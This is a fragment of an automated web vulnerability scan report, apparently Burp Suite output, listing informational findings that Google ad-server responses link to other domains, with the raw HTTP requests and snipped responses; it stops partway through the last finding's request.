<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Elmhurst.edu/ELSA%26adT%3DLearning%2BFor%2BA%2BLifetime%26adU%3Dwww.WGU.edu%26adT%3DTeach%2BAutistic%2BChildren%26adU%3Dwww.cpfamilynetwork.org%26adT%3DCerebral%2BPalsy%2BResources%26gl%3DUS&amp;usg=AFQjCNEVKLLpbKLKWkte_Ib-f5xc23i4vg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.364. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676513&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658513028&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658513039&frm=1&adk=2614322350&ga_vid=988220621.1303658513&ga_sid=1303658513&ga_hid=605195519&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.ncircle.com/ConfigControl%26adT%3DConfiguration%2BManagement%26adU%3Dwww.Cadillac.com/SRX%26adT%3DMB%2BML350%2Bvs%2BCadillac%2BSRX%26adU%3Dwww.nvisionglobal.com%26adT%3DFreight%2BAudit%2Band%2BPayment%26adU%3Dwww.PBMauditLawyers.com%26adT%3DPharmacy%2BAudit%2BLaw%2BFirm%26adU%3DConcur.com/Breeze_FreeTrial%26adT%3DConcur%25C2%25AE%2BBreeze%26gl%3DUS&amp;usg=AFQjCNEktniAOdspw0obWEY_WF-EyL8YDQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.365. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303684978&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fcontrolcasecom-contact%2Freflected-xss-cwe-79-ghdb-report-example-poc.html&dt=1303667003821&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303667003918&frm=0&adk=1607234649&ga_vid=1945752189.1303667004&ga_sid=1303667004&ga_hid=414532674&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=164&xpc=8TELaPLiUR&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:43:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4691

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg">
...[SNIP]...
4AhjIAvylmRioAwHoA7oC6AMF6AO5AugD3QX1AwIAAMQ%26num%3D1%26sig%3DAGiWqtzVzwxDrNZPE_bzRYE2rqSNL4si9Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkaRNOWG0TeODCIrJsQf8vNy9DOye5-oBpK-mjRfAjbcBABABGAEgvs7lDTgAUJbK_tsDYMnug4jwo-wSoAHQi_DtA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBBNoBZmh0dHA6Ly94c3MuY3gvMjAxMS8wNC8yNC9kb3JrL2NvbnRyb2xjYXNlY29tLWNvbnRhY3QvcmVmbGVjdGVkLXhzcy1jd2UtNzktZ2hkYi1yZXBvcnQtZXhhbXBsZS1wb2MuaHRtbIACAZgCoiC4AhjIAvylmRioAwHoA7oC6AMF6AO5AugD3QX1AwIAAMQ%26num%3D1%26sig%3DAGiWqtzVzwxDrNZPE_bzRYE2rqSNL4si9Q%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/controlcasecom-contact/reflected-xss-cwe-79-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.ZTSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHx1OrMwJ0u6bX1-mNc6i6xN-K4dg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.366. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681232&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663232891&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663232897&frm=1&adk=2614322350&ga_vid=2063264456.1303663233&ga_sid=1303663233&ga_hid=753296769&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:40:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-DQnLzKB5z_4NCcvMoHnPwAAAEAzMwdA-DQnLzKB5z_4NCcvMoHnPxnsrvSuVyNySsYda6b2ziV-UrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAFAcBAgUCAAQAAAAAXiC0fwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303663230%29%3Buf%28%27c%27%2C+52368%2C+1303663230%29%3Buf%28%27r%27%2C+173254%2C+1303663230%29%3Bppv%288991%2C+%278224513753449688089%27%2C+1303663230%2C+1303706430%2C+52368%2C+25553%29%3B&cnd=!ERDMugiQmQMQxskKGAAg0ccBKEsxdSC_azKB5z9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRSfQAPG68K7FoLqWJv-_Pl8m4fHVL_jPNfPA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtxJ_fVK0Ta-3PIu0sQf734nLCtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwIHYeoa95Y661w-QRjmHXxPOHSEQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.367. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:36:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1814

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=MzMzMzMzB0AzMzMzMzMHQAAAAEAzMwdAMzMzMzMzB0AzMzMzMzMHQPAItQ9TsS9xSsYda6b2ziVTGbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAwQ8BAgUCAAQAAAAARhgj9gAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303648621%29%3Buf%28%27c%27%2C+45814%2C+1303648621%29%3Buf%28%27r%27%2C+173254%2C+1303648621%29%3Bppv%288991%2C+%278155932420495182064%27%2C+1303648621%2C+1303691821%2C+45814%2C+25553%29%3B&cnd=!uhNGHwj25QIQxskKGAAg0ccBKEsxAAAAQDMzB0BCEwgAEAAYACABKP7__________wFIAFAAWJsWYABolgU.&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQZUwABwKsK5XZJlG1pwvDEXvW-18JcJH4eRw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBo5onUxm0TauBB8nslQfC07WjCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAowGwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtwwdyFN9lkGyxP0bKo4MqMf78G0iw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.368. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634688&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616850765&bpp=3&shv=r20110414&jsv=r20110415&correlator=1303616850771&frm=0&adk=1607234649&ga_vid=46826865.1303616851&ga_sid=1303616851&ga_hid=20450205&ga_fc=0&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=34&xpc=bnMIytOUQ3&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:47:29 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 6814

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CPeht6n5qZy8WRDYBRhaMgjz2BmTkCHVGA">
...[SNIP]...
3Dad_ntwk%2526cm_mmca7%253D728x90_-_GCN_Display_-_Explorer%2526cm_mmca8%253Daptm%2526cm_mmca9%253Dcontext_audience%2526cm_mmca11%253Dcpc%2526cm_mmca12%253Ddr%2526cm_mmca13%253D1%2526vrefid%253Dxss.cx"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPeht6n5qZy8WRDYBRhaMgjz2BmTkCHVGA" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBVleKUJ2zTaGZMYb9lQfw_qH1B7Pw4_cBw4iapxij3_6OWpDIfxABGAEgvs7lDTgAULqol8n6_____wFgye6DiPCj7BKgAfGnyvMDsgEGeHNzLmN4ugEJNzI4eDkwX2FzyAEE2gGSAWh0dHA6Ly94c3MuY3gvMjAxMS8wNC8yMy9kb3JrL3NlY3VyZWlkZW50aXR5Z3VhcmRjb20vYXBhY2hlLW1vZC1yZXdyaXRlLW9mZi1ieS1vbmUtYnVmZmVyLW92ZXJmbG93LXZ1bG5lcmFiaWxpdHktZG9yay1naGRiLXBvYy1leGFtcGxlLXJlcG9ydC5odG1s-AEBuAIYwAIByAKTtYAWqAMB6AO6AugD7gP1AwAAAMQ%26num%3D1%26sig%3DAGiWqty184GDzpH-mUSCUDMZeIVz6lsQFA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://ad.doubleclick.net/clk%253B225027794%253B48840119%253Bm%253Fhttp://aptm.phoenix.edu/%253Fcreative_desc%253D6432178747%2526provider%253Dgooglecontent%2526keyword%253D728x90_-_GCN_Display_-_Explorer%2526user3%253D1%2526unit%253Ddir%2526channel%253Dbanr%2526initiative%253Dgen%2526mktg_prog%253Dgen%2526placement%253Ddsply%2526version%253D728x90%2526classification%253Dad_ntwk%2526destination%253Daptm%2526distribution%253Dcontext_audience%2526user1%253Dcpc%2526user2%253Ddr%2526creative_id%253D11111111%2526pvp_campaign%253D14610_0957_9_95%2526cm_mmc%253Ddir-_-banr-_-googlecontent-_-gen%2526cm_mmca1%253Dgen%2526cm_mmca2%253Ddsply%2526cm_mmca3%253D11111111%2526cm_mmca4%253D6432178747%2526cm_mmca5%253D728x90%2526cm_mmca6%253Dad_ntwk%2526cm_mmca7%253D728x90_-_GCN_Display_-_Explorer%2526cm_mmca8%253Daptm%2526cm_mmca9%253Dcontext_audience%2526cm_mmca11%253Dcpc%2526cm_mmca12%253Ddr%2526cm_mmca13%253D1%2526vrefid%253Dxss.cx" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/secureidentityguardcom/apache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhoenix.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHq6rFW1lI9MbIYLy0wuJUTMape-g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.369. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676400&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658400890&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658400896&frm=1&adk=2614322350&ga_vid=431235471.1303658401&ga_sid=1303658401&ga_hid=1099197118&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14539

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DMercedesHouseNY.com%26adT%3DMercedes%2BHouse%26adU%3Dwww.Cadillac.com/CTS%26adT%3DE350%2Bvs%2BCadillac%2BCTS%26adU%3Dwww.google.com%26adT%3DTest%2BAdd%26adU%3DMercedes.JustAnswer.com%26adT%3DAsk%2Ba%2BMercedes%2BMechanic%26adU%3Dwww.coolcapitals.com%26adT%3DValencia%2BRestuarants%26gl%3DUS&amp;usg=AFQjCNGDdNuoNUm0Hag5OZ0x1MIb4XqVLA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.370. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
